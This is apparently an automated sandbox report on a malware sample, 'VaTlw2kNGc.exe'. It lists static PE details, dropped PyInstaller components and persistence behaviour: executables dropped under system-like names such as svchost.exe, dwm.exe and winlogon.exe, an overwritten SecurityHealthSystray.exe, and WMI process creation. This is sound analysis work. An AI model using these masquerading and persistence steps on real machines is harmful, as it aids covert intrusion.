                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\21b1a557fd31cc
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Mozilla Firefox\dwm.exe
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Mozilla Firefox\6cb0b6c459d5d3
                                  Source: VaTlw2kNGc.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                  Source: VaTlw2kNGc.exeStatic file information: File size 22154667 > 1048576
                                  Source: VaTlw2kNGc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: VaTlw2kNGc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: VaTlw2kNGc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: VaTlw2kNGc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: VaTlw2kNGc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: VaTlw2kNGc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: VaTlw2kNGc.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: VaTlw2kNGc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 00000004.00000000.1711609232.0000000000956000.00000002.00000001.01000000.00000006.sdmp, Build.exe, 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmp, s.exe, 0000000B.00000003.1750025071.0000000007689000.00000004.00000020.00020000.00000000.sdmp, s.exe, 0000000B.00000000.1741603424.0000000000663000.00000002.00000001.01000000.00000014.sdmp, s.exe, 0000000B.00000002.1764006617.0000000000663000.00000002.00000001.01000000.00000014.sdmp, svchost.exe, 0000000C.00000002.1767211934.0000000000913000.00000002.00000001.01000000.0000001B.sdmp, svchost.exe, 0000000C.00000003.1760108075.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1758798682.0000000000913000.00000002.00000001.01000000.0000001B.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: based.exe, 00000008.00000002.2653255671.00007FFE130C1000.00000040.00000001.01000000.0000001A.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: based.exe, 00000008.00000002.2642370223.00007FFE126EB000.00000040.00000001.01000000.00000015.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000008.00000002.2632791212.00007FFE11ED1000.00000040.00000001.01000000.00000017.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: based.exe
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: based.exe, based.exe, 00000008.00000002.2509833770.00007FFDFB705000.00000040.00000001.01000000.0000001E.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: based.exe, 00000008.00000002.2433044590.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: based.exe, 00000008.00000002.2661087553.00007FFE13301000.00000040.00000001.01000000.00000016.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: based.exe, 00000008.00000002.2532291858.00007FFDFB99F000.00000040.00000001.01000000.0000001D.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: based.exe, 00000008.00000002.2647849411.00007FFE12E11000.00000040.00000001.01000000.00000021.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: based.exe, 00000008.00000002.2610651844.00007FFE11501000.00000040.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: based.exe, 00000008.00000002.2601619118.00007FFE10301000.00000040.00000001.01000000.00000020.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: based.exe, 00000008.00000002.2642370223.00007FFE126EB000.00000040.00000001.01000000.00000015.sdmp
                                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: based.exe, 00000008.00000002.2532291858.00007FFDFB99F000.00000040.00000001.01000000.0000001D.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: VaTlw2kNGc.exe, 00000000.00000003.1701216930.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmp, hacn.exe, 00000005.00000003.1725096795.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1725774568.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1751685629.00007FFE13311000.00000002.00000001.01000000.0000000F.sdmp, based.exe, 00000008.00000002.2660929046.00007FFE13241000.00000002.00000001.01000000.00000011.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000008.00000002.2657823913.00007FFE13201000.00000040.00000001.01000000.00000012.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: based.exe, 00000008.00000002.2509833770.00007FFDFB705000.00000040.00000001.01000000.0000001E.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000007.00000002.1750856272.00007FFDFB78F000.00000002.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: based.exe, 00000008.00000002.2625141523.00007FFE11EB1000.00000040.00000001.01000000.00000019.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: based.exe, 00000008.00000002.2481464532.00007FFDFB67C000.00000040.00000001.01000000.00000022.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: based.exe, based.exe, 00000008.00000002.2532291858.00007FFDFBA21000.00000040.00000001.01000000.0000001D.sdmp
                                  Source: VaTlw2kNGc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: VaTlw2kNGc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: VaTlw2kNGc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: VaTlw2kNGc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: VaTlw2kNGc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline"
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline"
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB4358A0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,8_2_00007FFDFB4358A0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeFile created: C:\ProgramData\Microsoft\__tmp_rar_sfx_access_check_5115546Jump to behavior
                                  Source: _hashlib.pyd.6.drStatic PE information: real checksum: 0x0 should be: 0xc47c
                                  Source: setup.exe.11.drStatic PE information: real checksum: 0x55ddc3 should be: 0x56311d
                                  Source: _socket.pyd.6.drStatic PE information: real checksum: 0x0 should be: 0xf3db
                                  Source: _queue.pyd.6.drStatic PE information: real checksum: 0x0 should be: 0xbdb3
                                  Source: python310.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x170f8b
                                  Source: select.pyd.6.drStatic PE information: real checksum: 0x0 should be: 0x12cec
                                  Source: libssl-1_1.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x3d34c
                                  Source: libcrypto-1_1.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x110586
                                  Source: _bz2.pyd.6.drStatic PE information: real checksum: 0x0 should be: 0x174bf
                                  Source: wxyubnjmnlae.tmp.13.drStatic PE information: real checksum: 0x0 should be: 0x316d6
                                  Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x5531f
                                  Source: sqlite3.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x9ae0f
                                  Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x28949
                                  Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x213c2
                                  Source: svchost.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x3e6084
                                  Source: libcrypto-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x110586
                                  Source: updater.exe.13.drStatic PE information: real checksum: 0x55ddc3 should be: 0x56311d
                                  Source: python310.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x170f8b
                                  Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x174bf
                                  Source: _ctypes.pyd.6.drStatic PE information: real checksum: 0x0 should be: 0xe78a
                                  Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xf3db
                                  Source: _ssl.pyd.6.drStatic PE information: real checksum: 0x0 should be: 0x1721f
                                  Source: s.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x62099a
                                  Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xc47c
                                  Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x12cec
                                  Source: unicodedata.pyd.6.drStatic PE information: real checksum: 0x0 should be: 0x5531f
                                  Source: _sqlite3.pyd.6.drStatic PE information: real checksum: 0x0 should be: 0x1ae1a
                                  Source: libffi-7.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x9bb1
                                  Source: ChainComServermonitor.exe.12.drStatic PE information: real checksum: 0x0 should be: 0x397a7b
                                  Source: wouVpTZDoyPyABKEH.exe.52.drStatic PE information: real checksum: 0x0 should be: 0x397a7b
                                  Source: based.exe.4.drStatic PE information: real checksum: 0x5d9a9a should be: 0x5e534c
                                  Source: _decimal.pyd.6.drStatic PE information: real checksum: 0x0 should be: 0x28949
                                  Source: dasHost.exe.52.drStatic PE information: real checksum: 0x0 should be: 0x397a7b
                                  Source: _lzma.pyd.6.drStatic PE information: real checksum: 0x0 should be: 0x213c2
                                  Source: Build.exe.0.drStatic PE information: section name: .didat
                                  Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                                  Source: hacn.exe.4.drStatic PE information: section name: _RDATA
                                  Source: VCRUNTIME140.dll.5.drStatic PE information: section name: _RDATA
                                  Source: libcrypto-1_1.dll.5.drStatic PE information: section name: .00cfg
                                  Source: python310.dll.5.drStatic PE information: section name: PyRuntim
                                  Source: s.exe.5.drStatic PE information: section name: .didat
                                  Source: VCRUNTIME140.dll.6.drStatic PE information: section name: _RDATA
                                  Source: libffi-7.dll.6.drStatic PE information: section name: UPX2
                                  Source: setup.exe.11.drStatic PE information: section name: .xdata
                                  Source: svchost.exe.11.drStatic PE information: section name: .didat
                                  Source: updater.exe.13.drStatic PE information: section name: .xdata
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0094125A push ecx; ret 4_2_0094126D
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_00941DB0 push ecx; ret 4_2_00941DC3
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929B506C push rcx; iretd 5_2_00007FF6929B506D
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E0ACDD push rcx; retf 003Fh6_2_00000202B6E0ACDE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E3C6DD push rcx; retf 003Fh6_2_00000202B6E3C6DE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E6ACDD push rcx; retf 003Fh6_2_00000202B6E6ACDE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE62ACDD push rcx; retf 003Fh8_2_00000273EE62ACDE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE65C6DD push rcx; retf 003Fh8_2_00000273EE65C6DE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE68ACDD push rcx; retf 003Fh8_2_00000273EE68ACDE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB576EC6 push r10; retf 8_2_00007FFDFB576EC9
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB576CDC push r8; ret 8_2_00007FFDFB576CE9
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB576F9D push r10; ret 8_2_00007FFDFB576FB0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB576EAB push rsi; ret 8_2_00007FFDFB576EAC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB5791B3 push rdi; iretd 8_2_00007FFDFB5791B5
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB57A4B9 push rdx; ret 8_2_00007FFDFB57A510
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB5785B7 push r12; ret 8_2_00007FFDFB5785F3
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB576E9C push rsp; iretd 8_2_00007FFDFB576E9D
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB579D95 push rsp; iretq 8_2_00007FFDFB579D96
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB576F64 push r8; ret 8_2_00007FFDFB576F6C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB578F63 push r12; iretd 8_2_00007FFDFB578F7A
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB57856C push rbp; retf 8_2_00007FFDFB578585
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB57A174 push rsp; ret 8_2_00007FFDFB57A175
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB578E76 push rbp; iretq 8_2_00007FFDFB578E77
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB576F42 push r12; ret 8_2_00007FFDFB576F5A
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB576E54 push rdi; iretd 8_2_00007FFDFB576E56
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB576C31 push r10; ret 8_2_00007FFDFB576C33
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB576E0B push rsp; ret 8_2_00007FFDFB576E13
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB576D06 push r12; ret 8_2_00007FFDFB576D08
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB579C12 push rsp; retf 8_2_00007FFDFB579C13
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB578F0E push r12; ret 8_2_00007FFDFB578F35
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB576EE0 push r12; ret 8_2_00007FFDFB576EFE
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1

                                  Persistence and Installation Behavior

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Program Files\Mozilla Firefox\dwm.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile written: C:\Program Files\Mozilla Firefox\dwm.exe
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeProcess created: "C:\Users\user\Desktop\VaTlw2kNGc.exe"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69202\_hashlib.pydJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26762\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\select.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\rVVLbyhv.logJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69202\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\iaFEdjXM.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\sqlite3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\RKFGfNRs.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\_hashlib.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26762\unicodedata.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\chceADSX.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26762\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\qGmlrcYy.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Recovery\winlogon.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69202\_decimal.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\EcYAEBsU.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26762\_lzma.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\UuxpgXjt.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17002\_ssl.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\NXnICQCE.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26762\_hashlib.pydJump to dropped file
